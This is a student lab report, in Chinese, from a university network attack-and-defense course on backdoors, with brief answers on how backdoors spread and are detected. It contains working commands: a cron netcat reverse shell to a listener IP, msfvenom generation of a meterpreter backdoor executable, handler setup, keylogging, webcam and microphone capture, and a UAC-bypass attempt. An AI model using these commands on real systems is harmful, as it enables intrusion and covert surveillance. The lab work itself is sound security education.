20192429馬一 2021-2022-2 《網路與系統攻防》實驗二 後門原理與實踐
阿新 • • 發佈:2022-04-01
20192429馬一 2021-2022-2 《網路與系統攻防》實驗二 後門原理與實踐
目錄- 20192429馬一 2021-2022-2 《網路與系統攻防》實驗二 後門原理與實踐
一、實踐目標
- 使用netcat獲取主機操作Shell,cron啟動某項任務
- 使用socat獲取主機操作Shell, 任務計劃啟動
- 使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell
- 使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
- 使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
二、實踐原理與具體步驟
2.1 netcat獲取主機shell
2.1.1 win為攻擊機 kali為靶機
-
windows中,在ncat.exe檔案目錄下輸入 ncat.exe -l -p 5310 啟動監聽
2.1.2 kali為攻擊機 win為靶機
-
在kali中輸入 nc -l -p 5310 開始監聽
2.1.3 cron啟動任務
21 * * * * /bin/netcat 192.168.31.133 5301 -e /bin/sh
該命令表示,在每小時的第21分鐘執行後面的命令
2.2 socat獲取主機shell
2.2.1 建立任務
- 新建觸發器並起名,在 程式 選項中選擇 socat.exe 的路徑,新增引數:
2.2.2 等待11:41時彈出任務框
2.2.3 使用kali獲取win的shell
2.3 使用MSF 生成可執行檔案,利用ncat傳送主機並獲取shell
2.3.1 使用MSF生成可執行檔案
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.133 LPORT=5310 -f exe > 20192429_msfbackdoor.exe
2.3.2 將檔案傳輸到Windows中
2.3.3 MSF進入監聽
- 輸入 msfconsole 進入MSF
use exploit/multi/handler 設定payload
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.133 設定ip
set LPORT 5310 設定埠
show options 檢視選項
exploit 進入監聽模式
2.4 使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權
2.4.1 獲取音訊內容
record_mic
2.4.2 獲取攝像頭內容
webcam_snap
2.4.3 獲取擊鍵記錄
keyscan_start 開始記錄
keyscan_dump 讀取記錄
- 此處提權失敗,綜合分析應該是windows系統UAC無法允許該程式通過,
2.5 使用MSF生成shellcode,注入並獲取shell
- Payload是包含在你用於一次漏洞利用(exploit)中的ShellCode中的主要功能程式碼。因為Payload是包含在ShellCode中的,ShellCode是真正的被輸入到存在漏洞的程式中的,並且ShellCode負責把程式的流程最終轉移到你的Payload程式碼中。所以對於一個漏洞來說,ShellCode就是一個用於某個漏洞的二進位制程式碼框架,有了這個框架你可以在這個ShellCode中包含你需要的Payload來做一些事情。
- pwn20192429檔案為32位檔案,可以找到合適的payload為:linux/x86/meterpreter/reverse_tcp
- 通過檢視該payload的配置進行如下配置:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.31.133
set LPORT 4444
exploit
三、回答問題
3.1 例舉你能想到的一個後門進入到你係統中的可能方式
- 在非官方網站下載檔案或應用時,99.9%的連結都被做過病毒處理,或者下載例如360,qq等應用時都會捆綁很多軟體,而且令人痛恨得是,這些軟體往往很難刪除,而且裝入電腦後它們會自動改名,所以很難發覺,並拖慢電腦執行效率
3.2 例舉你知道的後門如何啟動起來(win及linux)的方式
- 捆綁處理,例如將自動關機捆綁某個.exe檔案中,一旦開啟你的電腦就會關機。
3.3 Meterpreter有哪些給你映像深刻的功能
- 可以獲取靶機的音訊、攝像頭、擊鍵記錄等功能。這些許可權往往在獲取前都需要得到管理員同意,但該程式通過後門越過許可權
3.4 如何發現自己有系統有沒有被安裝後門
- 利用高階防毒軟體查殺;在資源管理器中查詢有無垃圾資源,或在程序管理器中檢視有無怪異程序
四、問題出現與處理
4.1 可執行檔案傳輸失敗
- windows防火牆攔截了企圖獲取許可權的後門程式,需要我們手動允許該程式執行
4.2 提權失敗
- 本方法參考該文在基礎提權操作的基礎上,使用 use exploit/windows/local/bypassuac_eventvw 進入繞過uac方法進一步提權,儘管打開了事件檢視器,但任然提取失敗,在查詢資料後仍得不到解決方法,但在此處將方法分享,我會繼續想辦法解決該問題。
五、實踐感想
- 通過本次實踐,我深入瞭解了MSF的工作原理,同時加深了我對本門課程的興趣,投入到今後的新的內容中,同時我也意識到,網路安全的嚴重形勢刻不容緩,黑客技術讓我國的網路安全變得危險,我們要更加深入得學習網路攻防技術。